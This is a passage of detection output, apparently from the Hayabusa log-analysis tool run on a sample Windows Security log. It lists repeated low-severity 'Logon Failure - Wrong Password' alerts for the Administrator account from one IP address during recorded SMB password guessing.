NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FgQbvpfuS11matJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R9TwJS4B9ZaDD2Ze : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPUuoopOnwlTjlTP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9VEyOUuiOi8Q3JBJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGGGazMTBBfrppDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NKO4V35Y2qPEB59W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WxVdhpR7ZnAluurU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZjAZb9bQKZjwL8u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aKyLX5ChpgBuFEbr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49t2xJvH2yHcyHle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sg9Z6Pyix2UkMolr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0NN2olYn97ZoYCja : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S98j54bDGsz0k6g9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxFEw9s0nnEQGzUN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSswFHFSlqcQd47k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7icutlVIWSLZJszQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSwyugYn0n3i5f25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmBaLCUcR7TmixTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1oOBz2NQSCdTwa7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O4tU1LPF5DRW9Vm0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRsSNqPYruWBzp2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3JZhBLzt4af1VtCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dFLZIKSDBvBaWq59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: guAG4ZTFMjZAxp1A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yd04xsSIdiczICeG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cx3i1URKPhC6KWI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Npc6IS27HsWP3JA9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIBnr0eZ1bHHGokW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6gTTrUVjpPU80LlC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZlmUbCNAJga24JH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zf3aSGBMe97VujaH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bx7ZM77aDG7y6Lh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BnHHAClMwyqA3TTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00ibRrYvnFt5w9X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VglTKbnLVFvHZHzQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NwX0sDFwHQG7Tkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3mMx3M1zurKMBzyj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sH7b8P0O0uea3PlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJcrTyBPuX0TcvOT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwuZIQAL3BmJnPsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxgAfsnH6YWLRD0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ttBOjzmEBjr9W2QW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FPDKGGYkJQeWgtUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nSoJWqS6YPbpCiBf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pr2oMzxv7pcDfsgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jiopmZAMpwg3dEaA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG1Bxm0lt3vwoO5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Kf5AaQX7KOVAIAN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW9nBirBTHIXIrfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9qKcDhfcf2kMk00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9NgStzf2xQ4P7q0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9mCrjQykX06IcMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7S0QccvEhetekdDP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n1OnibuatFHwDeLz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8u26bKzFOw12m0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WEEtOj6BOkI7MPY1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiCpuqll36DojD3e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9zjo9ZsSVLZcrsr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KKDD0O5flEsIEDRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jdPMREVdBEJ50ELC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p7YwRYYCnsr2v08C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWyAzzpmxUm2CXE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9RNqhxyUBjUIic0n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1JERyz3mOBZt2jki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0i93RW5AOsIKKMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U3XEu06vE68O900O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0fxeGE2jXOnoJttj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Wdg3l6IFHTdh09j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XLVQRnkUd3bfgvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rHjqFQwqpCJFI6qP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L5pEWq2mYsFpFLbb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSFKJXTC2wlyw0gu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vh5igCJpAA5rmqzV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5NzLlJWkfXDcm64c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9sR1QHgZ4oaa82F : IP Address: 192.168.198.149 : AuthPackage: 